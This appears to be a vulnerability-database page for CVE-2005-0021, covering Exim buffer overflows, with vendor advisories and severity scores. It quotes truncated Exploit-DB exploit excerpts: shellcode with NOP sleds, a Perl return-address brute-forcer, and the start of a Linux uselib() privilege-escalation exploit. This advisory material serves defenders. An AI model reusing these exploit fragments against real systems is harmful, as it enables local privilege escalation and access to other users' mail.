CVE-2005-0021
published 2005-05-02CVE-2005-0021: Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as…
PriorityP334high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
2.62%
83.5th percentile
Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | exim4 | < exim4 4.34-10 (bookworm) | exim4 4.34-10 (bookworm) |
| university_of_cambridge | exim | <= 4.40 | — |
| university_of_cambridge | exim | — | — |
| university_of_cambridge | exim | — | — |
CVSS provenance
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
osv7.2HIGH
vendor_debian7.2HIGH
vendor_redhat7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-4wq7-f94f-64w2: Multiple buffer overflows in Exim before 4
ghsa_unreviewed·2022-05-01
CVE-2005-0021 [HIGH] GHSA-4wq7-f94f-64w2: Multiple buffer overflows in Exim before 4
Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
OSV
CVE-2005-0021: Multiple buffer overflows in Exim before 4
osv·2005-05-02·CVSS 7.2
CVE-2005-0021 [HIGH] CVE-2005-0021: Multiple buffer overflows in Exim before 4
Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
Ubuntu
exim4 vulnerabilities
vendor_ubuntu·2005-01-07
CVE-2005-0022 exim4 vulnerabilities
Title: exim4 vulnerabilities
Summary: exim4 vulnerabilities
A flaw has been found in the host_aton() function, which can overflow
a buffer if it is presented with an illegal IPv6 address that has more
than 8 components. When supplying certain command line parameters, the
input was not checked, so that a local attacker could possibly exploit
the buffer overflow to run arbitrary code with the privileges of the
Exim mail server. (CAN-2005-0021)
Additionally, the BASE64 decoder in the SPA authentication handler did
not check the size of its output buffer. By sending an invalid BASE64
authentication string, a remote attacker could overflow the buffer,
which could possibly be exploited to run arbitrary code with the
privileges of the Exim mail server. (CAN-2005-0022)
Instructions: In general
Red Hat
security flaw
vendor_redhat·2005-01-04·CVSS 7.2
CVE-2005-0021 [HIGH] security flaw
security flaw
Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
Debian
CVE-2005-0021: exim4 - Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arb...
vendor_debian·2005·CVSS 7.2
CVE-2005-0021 [HIGH] CVE-2005-0021: exim4 - Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arb...
Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
Scope: local
bookworm: resolved (fixed in 4.34-10)
bullseye: resolved (fixed in 4.34-10)
forky: resolved (fixed in 4.34-10)
sid: resolved (fixed in 4.34-10)
trixie: resolved (fixed in 4.34-10)
No detection rules found.
Exploit-DB
Exim 4.41 - 'dns_build_reverse' Local Read Emails
exploitdb·2005-05-25
CVE-2005-0021 Exim 4.41 - 'dns_build_reverse' Local Read Emails
Exim 4.41 - 'dns_build_reverse' Local Read Emails
---
/*
* ripped straight off iDEFENSE advisory - so lazy I just picked
* up GDB... bored on a weeknight :(
*
* nothing to write home to mother about due to the fact that
* you need a local user account on a server and all you
* get is to read other people's emails ....
*
* not even my own shellcode. aleph1 shellcode - cut and paste job
* with nops to pad.
*
* Regards,
* Plugger aka Tony Lockett
*
*
*
*/
char bomb[288]=
/* the gear from iDEFENSE */
"::%A:::::::::::::::::" /* 21 bytes */
/* -------- */
/* NOPS for padding */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90
Exploit-DB
Linux Kernel 2.4 - 'uselib()' Local Privilege Escalation (2)
exploitdb·2005-01-27
CVE-2004-1235 Linux Kernel 2.4 - 'uselib()' Local Privilege Escalation (2)
Linux Kernel 2.4 - 'uselib()' Local Privilege Escalation (2)
---
/*
* EDB Note: There's is an updated version ~ https://www.exploit-db.com/exploits/895/
*/
/*
* Linux kernel 2.4 uselib() privilege elevation exploit.
*
* original exploit source from http://isec.pl
* reference: http://isec.pl/vulnerabilities/isec-0021-uselib.txt
*
* I modified the Paul Starzetz's exploit, made it more possible
* to race successfully. The exploit still works only on 2.4 series.
* It should be also works on 2.4 SMP, but not easy.
*
* thx newbug.
*
* Tim Hsu Jan 2005.
*
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define str(s) #s
#define xstr(s) str(s)
Exploit-DB
Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow
exploitdb·2005-01-15
CVE-2005-0021 Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow
Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow
---
/*
This proof-of-concept demonstrates the existence of the vulnerability
reported by iDEFENSE (iDEFENSE Security Advisory 01.14.05).
It has been tested against exim-4.41 under Debian GNU/Linux.
Note that setuid () is not included in the shellcode to avoid
script-kidding.
My RET is 0xbffffae4, but fb.pl can brute-force it for you.
Brute Force fb.pl:
#!/usr/bin/perl
$cnt = 0xbffffa10;
while (1) {
$hex = sprintf ("0x%x", $cnt);
$res = system ("./exploit $hex");
printf "$hex : $res\n";
$cnt += 4;
}
exploit.c:
*/
#define NOP 0x90
#define TAMBUF 368
#define INIC_SH 20
#include
int main (int argc, char **argv) {
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
"\xf3\x8d\x4e\x08\x31\x
http://ftp6.us.freebsd.org/pub/mail/exim/ChangeLogs/ChangeLog-4.44http://security.gentoo.org/glsa/glsa-200501-23.xmlhttp://www.debian.org/security/2005/dsa-635http://www.debian.org/security/2005/dsa-637http://www.exim.org/mail-archives/exim-users/Week-of-Mon-20050103/msg00028.htmlhttp://www.idefense.com/application/poi/display?id=179&type=vulnerabilitieshttp://www.idefense.com/application/poi/display?id=183&type=vulnerabilitieshttp://www.kb.cert.org/vuls/id/132992http://www.redhat.com/support/errata/RHSA-2005-025.htmlhttps://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10347http://ftp6.us.freebsd.org/pub/mail/exim/ChangeLogs/ChangeLog-4.44http://security.gentoo.org/glsa/glsa-200501-23.xmlhttp://www.debian.org/security/2005/dsa-635http://www.debian.org/security/2005/dsa-637http://www.exim.org/mail-archives/exim-users/Week-of-Mon-20050103/msg00028.htmlhttp://www.idefense.com/application/poi/display?id=179&type=vulnerabilitieshttp://www.idefense.com/application/poi/display?id=183&type=vulnerabilitieshttp://www.kb.cert.org/vuls/id/132992http://www.redhat.com/support/errata/RHSA-2005-025.htmlhttps://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10347
2005-05-02
Published